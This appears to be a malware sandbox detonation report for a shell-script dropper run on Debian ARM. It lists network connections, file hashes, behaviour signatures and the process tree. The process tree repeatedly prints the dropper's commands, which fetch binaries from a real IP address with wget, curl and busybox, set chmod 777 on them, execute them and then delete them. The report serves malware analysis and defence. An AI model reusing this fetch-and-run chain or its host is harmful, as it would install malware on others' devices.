[curl -O http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/bin/chmod
[chmod 777 yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
[./yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/bin/rm
[rm yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.65.91:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 151.101.65.91:443 | tcp | |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 84.17.50.9:443 | tcp | |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 84.17.50.8:443 | 1527653184.rsc.cdn77.org | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-21 08:15
Reported
2024-11-21 08:18
Platform
debian9-armhf-20240611-en
Max time kernel
53s
Max time network
82s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | N/A |
| N/A | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | N/A |
| N/A | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | N/A |
| N/A | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | N/A |
| N/A | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | N/A |
| N/A | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | N/A |
| N/A | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | N/A |
| N/A | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | N/A |
| N/A | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | N/A |
| N/A | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | N/A |
| N/A | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | N/A |
| N/A | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | N/A |
| N/A | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | N/A |
| N/A | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | N/A |
| N/A | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | N/A |
| N/A | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | N/A |
| N/A | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | N/A |
| N/A | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | N/A |
| N/A | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | N/A |
| N/A | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | N/A |
| N/A | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | N/A |
| N/A | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | N/A |
| N/A | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | N/A |
| N/A | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /usr/bin/curl | N/A |
Processes
/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
[/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/chmod
[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/rm
[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/wget
[wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/chmod
[chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
[./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/rm
[rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/usr/bin/wget
[wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/chmod
[chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
[./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/rm
[rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/usr/bin/wget
[wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/chmod
[chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
[./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/rm
[rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/usr/bin/wget
[wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/bin/chmod
[chmod 777 sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X
[./sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/bin/rm
[rm sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X]
/usr/bin/wget
[wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/bin/chmod
[chmod 777 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l
[./0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/bin/rm
[rm 0wprA81cTZqq8CpDff9xycubkPkIuEDv1l]
/usr/bin/wget
[wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/bin/chmod
[chmod 777 TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc
[./TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/bin/rm
[rm TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc]
/usr/bin/wget
[wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/bin/chmod
[chmod 777 yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv
[./yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/bin/rm
[rm yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv]
/usr/bin/wget
[wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/bin/chmod
[chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
[./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/bin/rm
[rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/usr/bin/wget
[wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/bin/chmod
[chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
[./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/bin/rm
[rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/usr/bin/wget
[wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/bin/chmod
[chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
[./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/bin/rm
[rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/bin/chmod
[chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
[./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/bin/rm
[rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/usr/bin/wget
[wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/bin/chmod
[chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
[./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/bin/rm
[rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/usr/bin/wget
